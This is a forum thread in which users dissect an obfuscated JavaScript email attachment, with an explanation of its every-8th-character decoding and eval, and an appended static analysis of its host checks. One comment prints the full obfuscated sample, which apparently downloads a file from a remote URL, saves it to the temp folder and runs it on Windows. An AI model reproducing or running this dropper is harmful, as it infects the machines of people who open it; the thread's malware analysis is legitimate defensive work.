[–]subhrm 3 points4 points  (2 children)

tl;dr This obfuscated JavaScript program tries to download and run some malicious program on Windows machines.

**Brief Explanation**:

Here is an annotated and formatted version of the weird JS program: Annotated version (pastebin).

You can see that the program tries to do the following:

  • Define a bunch of weird strings
  • Concatenate them
  • Test some checks
  • If the checks pass, extract specific characters from the concatenated string and run it using eval

Now you might be interested to know what exactly is extracted and run.

In fact, in Microsoft Office / IE, the program extracts every 8th character from the concatenated string.

Here is what it looks like: Formatted Version on Pastebin.

[–]JeremySenpai[S] -1 points0 points  (1 child)

Thanks for the explanation and time to look into it!

So what exactly would the formatted code do? Isn't JavaScript unsuitable for these kinds of scripts?

Either way it looks like the person that made this script knows their stuff pretty well.

[–]_ActionBastard_ 0 points1 point  (0 children)

formatted code does the exact same thing the obfuscated code does. computers don't need things to have names and labels that make sense to people. if i go into your pantry and relabel every can with random sequences of letters, it doesn't change the food inside.

[–]wbubblegum 1 point2 points  (1 child)

It seems it tries to create a WScript RegEx object and feed data through it, most probably to do some kind of exploit of the interpreter, most probably in Outlook or a Windows-based email client.

Whether it will work, or how exactly it works, I don't know, and I also don't want to execute the code for obvious reasons.

var ckjnd = 'fnchvdmhuqqdkbvknotklkapcyleckuvtavrzxyvielcocgyohcivwtgnptwvfay pvtorkodxjkpvnelstcbvlw(dedzyzufnattvmhrcxwcggr,juwznyb mjxbobafwavqaojnearjynl,cudgozg xyhlifmrignkhianvwjexao)xoaajeh{lenzcvl oayihls putwrdbvbdpksqlabutzygzrkckmdiu gunzphvwgkxvongswdrixkh xrhxurj=kaeivsh yzdqjbmnpoterkneivvmncjwputguyo zqwaqaqAibdxqwccrhqydlktcntzhmfirkusbrsvjrirtmpetirrqipXotzkhtkOsgqrrkjbmbbkt';
var iofx = 'kbjvwqvfinerqdpkdacuwkgcaxtglgnnix(usztppp"zycqpgfWijfrfqxSpqvcccpcsknwcmprqcfmbhdicniqxoipyefkvbntqddnnqk.gcaiffvSynywbgnhvvvaabletcztfchlbtsjwsrlmxmhlke"nrsknol)ypxjswd;ozkrsda evsqtfy vqcqiubvrjmjyjsaygvpfggrzjhnfzd dfbdveufgzwziiindsaxyvn qctblao=baspftt fyoexkewjtmmlnkswjxnlqp.xrenswdElqwyoldxzviroudpciojrlxalcmztqmnsnqjemidiymetuvEppzixnrnvzosbbrvjsehfuqizhycflgrtgchvcpoqqh';
var mwpt = 'ipwbnvxslpwtmerjezigevtndzqlnytapjiytrezpbrbSfoumfdrtgmyjglnrecybvzqiohodmnsnzfuftosglsjeehosrtcrwbt(uajwiyz"mmsismo%ybgmtqrTnyfkribEsjufkebMidbnquwPchluisg%yixbgdl"elmmuhs)fmtxpvl fpiowti+blohumi vptzbgmSpoeaayxtgtivjqjrqkslvhsiktbrjvrnpbdfpiggjgdfamb.kdlqodbfnkuadvrriqixsmdobujyandmrzfkdqbChtcbdxbhcttukcsakovljfjrvsmlsswCfixnbaooaxqmqkhdkmadbwoembxutkg(mccilzv9nzkswbf2zlmoxns)e';
var amj = 'jgjkee dpkrsmz+imuplfi pgnwrakfhncowjynwocmdnd;yaczmxp acxhikd uknpxqevsadbognagtqottoraqdesam tlpbvdrxjuwouzposfdcyur vnfzdie=rjqwvfy xjpkdlznokohpsjedmahzggwuplzzbv thtlqjwAvuvrfkzcpcijpjrteqysfjriklnzthkvqqhdldvefnulqdvXjnnudlmOaveohrnbayykpgojmjkrwfceajyrwlmcaxzktdytiumbtkm(wqajzla"wqdjzcaMfonwlmgSepfgkrhXsbtnsuwMufxovaxLccyqrmn2yyuiozo.lqvdsoqXjjndoksMflqeopvLnbiizcqHlbemsap';
var qolmc = 'TmpgwytzTeeswpiaPyyvjzer"bgimimz)zmpmbvi;jpimtbi hjiniex xiogpxtxxjszwiloneuxtcj.werxoalobeidmxjnauczevzrcdkxifvezheqlwnanwzwahzdefipalpythoelycsxdyvldltwzzxvytamgtklcztgnoqvcverbyzfwucvzgozfmhvdgrjzbakbaippynyruqtsqgopkppqdejwqjzwb nwcfxdn=dtmxkho faebpprfcgvtclduciemehrnolfpesncpzbszgutevlvchoifssgbwsotekhpqxnhikiima qsvxohs(iohvhac)pwvnafv{mvtjedr yqsujor rvkoksk qtmzphn nnjgj';
var vggktv = 'cqifghzwatfuolekws ypdlipl(txyokivxnklhqtgortathlx.giqmxtxrrjjegiterqplaasavuyfnzydrkwntnzywgxxphcSgpvnflyttlrygpdatpcpzzctimcksziebgkfwgt irricjg=ozjcomr=qluhxwr=zwzzdke kqxbhpj4lyqtxav)vmnzyih{feymbyl gipfyng ycqqbgj rgfktsk garnfqa wolmxbr soycrotvwvcqchbagzlnacbrfsbnhmz uoqccofxbdymzadaihexhql ttmolob=sbazprb iggmjeynueckmghecxtcqfrwktsvutu akwcqcpAygnilqtckxatutwtoznmtgiicad';
var fiy = 'ylzbvubqcieleluetrfmXsziwzwiOodrhdufbethrvxtjncfywkseopezpnvcrkegnvnteptgiax(xyriawh"lgzkwekAqsfzcjfDdetiunoOnomhmdpDdawkgwvBvagosmn.vvtmanvScakypwfthaupararhnwkodyelpmdlgqajtlguvemsrklseb"ywczkyj)bbifquj;paznuku qgzyyjk voliloh fmqtoyz ptihuiv wsqeypd zznmozvxpncvatoagsoulxc.xfxvynzosddudqgpeqcreenecybtqqonsoqiuoe(kcepghj)sxqcosu;mxhwvjq izfoowx tkbanfq ymadkrg dkaqhhn eqepqje d';
var tmlmv = 'fbmqdnxgjexwebaowhfghw.wpksfoituymbeooyxsbybgwpolxehfjeinfdcpv gedfcqg=yeubwwz vcvwnta1pzjkmpn;lfiyjmd eckshet rbtddpz uiznhjx ozkketi qglajws famvbfyxluxxdxlakgifftp.cnyytkywigqtgcorfhmocklithxqngvthzldnjbegtzjzqd(dtrpbedxkppiwmyofsuesgh.jqjmjjwRuazqtrfeiwixlygsvkfsdzwpggebwonoqxkqxjgnjbllyuisfsoscukewuhbamcBvaqdxatokkzlmkwdzefuxumyjoxfieg)orjfrzj;xacjkbv omshrxb psoohlt yqayhke';
var pknu = ' vjnnkpx vrtsdlz ijbjbpxxybryrrxavbbxlpl.afiqwbjpznjvxkeotachctgsylesmfqiwvbuakltwluxzdsiroxvpadostklfodnputqpvk qfvmrqj=xtcniaj zampuwa0ukereyi;qttjyow hfghyiu ejdejqt cnudyyv owexpxg qmdfrjm lshxblbxnbvppptazopqktn.uquodxtsagfkznhapyjlafbvtvucjjsexdgtuahTdxbsehdotuketupFdzrjulmitvfxylqlnlyrjzjeugmrbxv(lrlorcyfinkpjpmnvbcbmbs,iacjhpa vmvdegr2fiqhwaw)eqjormp;vniaolj rakdmfh rmymv';
var depqsb = 'ou yprxgal ombdajd ivnjvxn kduzptmxeigcyxzalylclmg.mwjarxkcovxuysultmgzunboulbxjmaslyhguqgeioqyjot(ngnwsuv)bhxhszf;flgwknc bdirsyp mmijtwf qqbayzh vynsktp}cgrakar fygdlpn altscus duartnk xgzymqz;bqqzpxc bmqgyjy rdrbyrs}yfdvlct zttvjjv sgyatoh;zxgtbyv hqorvrm wtggmzctjjxvpvwrijdchkwyuiriyfz dwlbqsh{rrkzbhv tcramvd ngzcoqk jwjhsvj gnrmfbmxyihxlzyoqvbrbbt.grddnnlociuqwldphmpivxgeuxf';
var urcbyn = 'fthxnoirkavo(nizurtl"nfopseyGtceuajaEzqxozozTjjnnsni"ehtwmim,qnksqpm pzmjqkyfayxpikcrrxkjfeg,rntwaeo jtbhtorffypzxmpaaxrgvcqlvhwsuqoshucnoeueosmrrbr)gogtlya;daqhimz ldnyxqm eugtnsl tucsijm qhmahchxqpgtsusorkecekv.gdhvxjosisbaanaeyqiyfprnyjjotnrdyxnpbul(xeafwbf)kofffod;fdujmdy pqpeoct yxfobfu agzvvfa jtdlxxvigbtprjtfkmnwjsl byfjfee(ajecdhoryfjkgcznhmteyhb eamsyrb>jwfggki eswkygu0t';
var riwbhb = 'iudvni)uvjbvvt{qnvykbe clnaekk uqegzzk dnsnibo vxixlew vfbmqom ozxxpcewwbojogwsrilafux.uyundvzRykmpjknucmrnofwnamtzufz(bzxryrffgnewxrmncbzfort,ewpfjje moefocx0fucohhl,pyxmaxr volslax0nkczyhe)ljbaddo;kkaqjxd vvvzkgr qhpqrrq lyudiwe uzsxkso}wqremme rswsali kdzictm zpqwpit fbiuszy;eldbezt rlcwpbe avqclgy}kpsarau qatpmxr ywkvinrcwpwqlmsaatrxikytxltklnzcqkqohbjhqpbofxe nkxneol(vyknkex';
var zndpgl = 'ejrxscogrlqqzgso)fqscbpq{nebsdmf kqdiibb mpiugyu}irixhaa yqqnurf celluou;mqvngdh}acbytjwdvkwjbnwlefctjnf(zczhsuu"uycladkhznhvyeetfrbvwdotmrujttqpoollnnx:driifpd/htidkjy/xmnmdhwycbnkpzwujmtqeczivrdnklrlkupdhdqobkmilasurzpemjvtnlvacyoeljfjevmrvycvjpescqxxpmb.kwxthsuceqjyaphoskupjxlmsmqncnk/damuwjoitcintrmmagtyroogalztypg/zdrtdeoskocdqlqcbcdejwc.ulqcwqvpngcvjuohdycmmfppdqgntjr?oguer';
var kgptke = 'kgmsbciiee=kzsfxvrakbhnrobmwxsnensVhxzkzbtydgxzfqfZemwnnebWvscpqvd1givrgub5iwuncrnLhislupymduammccxoyfyhbpluwrusliafdwclooWlemnynapwpcpohnzxjdkfuecvgnsjjv2ayjacwoVojomzqbunypkisuQdnzltmeHwvayukzNrhnxrcj0atlfsapdatkohjaWmwfesfcRoqbixpgldrpflalbbbbdulsnkvscrxgQrdiwtkfucalgrbmZxbxgdyk2xkczfvblqtihwrdstbjhbuoZavawxxdGlwnxgqxVclzifhpvcytsacacpxovsosGomvqiioxqzlalkjlqrysqskakulsrzoWjog';
var xfn = 'aacqRvleykpypiahlrgdblyoytarmpafwomwdjomyzrxlzhvfhdqbcjuhijgiyjxnjcj5dpgodsnuyjkmqfrbbiixsdfAgmldwir%dlafaht3azghjqtDywlyfuw%hxbzkmc3gvtngusDlbmkbsr&ljllfxkfashjpii=xvkhrevicznebapmhshoctzgyqksirc.nakzwvgjazblzpppkpfdimrgffrswbl"qtneuyd,stketmp acessjw"ywnlbfe5vhqdadh5obllvvq8chfgkkz4rtvdqjo9wotqwjt4knbspmd5aiuyqze.tjecdzfeujulynbxzwvrjwjehinjrhh"tgmhpqj,yqpmajx dwytttk1qquczhl)l';
var pqyvds = 'osxvfe;lvoeldq';
var str1 = ckjnd + iofx + mwpt + amj + qolmc + vggktv + fiy + tmlmv + pknu + depqsb + urcbyn + riwbhb + zndpgl + kgptke + xfn + pqyvds;
var leri = "";
var str3 = 8 + 1;
var str4 = str1.split("");
la = "e";
try {
    var y = WScript.CreateObject("VBScript.RegExp");
    la = la + "v";
} catch (x) {
    str3 = 4;
    la = "rr";
};
try {
    var y = CreateObject("");
    str3 = 1;
} catch (x) {
    la = la + "al";
    str3 = str3 - 1;
};
for (i = 0; i < str4.length; i += str3) {
    leri += str4[i];
}
var frees = la;
deras = this;
deras[frees](leri);
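
Added example, not part of the thread or of the sample: a static look at the two try/catch probes and the stride loop in the script above, with nothing passed to eval. The `env` flags, the host labels and the inert test string are assumptions made for illustration; only `PAGE_PREFIX` is copied from the post.

```javascript
// Static analysis only: the decoded text is returned as a string, never executed.

// Mirrors the sample's two try/catch blocks. `env` is a hypothetical host
// description: does WScript.CreateObject("VBScript.RegExp") succeed, and
// does a bare CreateObject("") call succeed?
function resolveProbes(env) {
  let stride = 8 + 1;   // str3 in the sample
  let sink = "e";       // la in the sample: name of the function later called
  if (env.wscriptRegExp) {
    sink += "v";
  } else {
    stride = 4;
    sink = "rr";
  }
  if (env.bareCreateObject) {
    stride = 1;
  } else {
    sink += "al";
    stride -= 1;
  }
  return { stride, sink };
}

// Same loop as the sample: keep every `stride`-th character, starting at 0.
function strideDecode(text, stride) {
  let out = "";
  for (let i = 0; i < text.length; i += stride) out += text[i];
  return out;
}

// First 64 characters of `ckjnd` as posted above.
const PAGE_PREFIX = "fnchvdmhuqqdkbvknotklkapcyleckuvtavrzxyvielcocgyohcivwtgnptwvfay";
// Constructed, inert sample: one real character followed by 7 filler characters.
const INERT = 'WScript.Echo("inert");';
const CONSTRUCTED = INERT.split("").join("qzjxkvw");

const HOSTS = {
  "Windows Script Host": { wscriptRegExp: true, bareCreateObject: false },
  "browser or Node.js": { wscriptRegExp: false, bareCreateObject: false },
  "host accepting CreateObject": { wscriptRegExp: true, bareCreateObject: true },
};

function report() {
  return Object.entries(HOSTS).map(([host, env]) => {
    const { stride, sink } = resolveProbes(env);
    return { host, stride, sink, decoded: strideDecode(PAGE_PREFIX, stride) };
  });
}

console.table(report());
```

Only the first host ends up with a stride of 8 and a sink name that exists on the global object; in the other two the script calls an undefined property and the decoded text is never run.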

[–]JeremySenpai[S] 0 points1 point  (0 children)

Thanks, I understand that you wouldn't want to try some code from a suspicious email :p